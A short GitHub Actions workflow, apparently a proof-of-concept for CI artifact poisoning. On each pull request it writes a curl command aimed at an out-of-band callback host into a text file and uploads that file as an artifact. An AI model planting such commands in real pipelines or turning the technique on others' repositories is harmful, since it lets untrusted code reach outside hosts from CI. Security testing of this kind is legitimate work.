# .github/workflows/workflow1.yml
name: Create Artifact

on:
  pull_request: # Trigger when a PR is created or updated
    branches:
      - main

jobs:
  create-artifact:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Generate artifact
        run: echo "curl http://og8tso3vscbzc12aorcwmbzn3e95xu.oastify.com" > pr_info.txt

      - name: Upload artifact
        uses: actions/upload-artifact@v3
        with:
          name: pr_info
          path: pr_info.txt
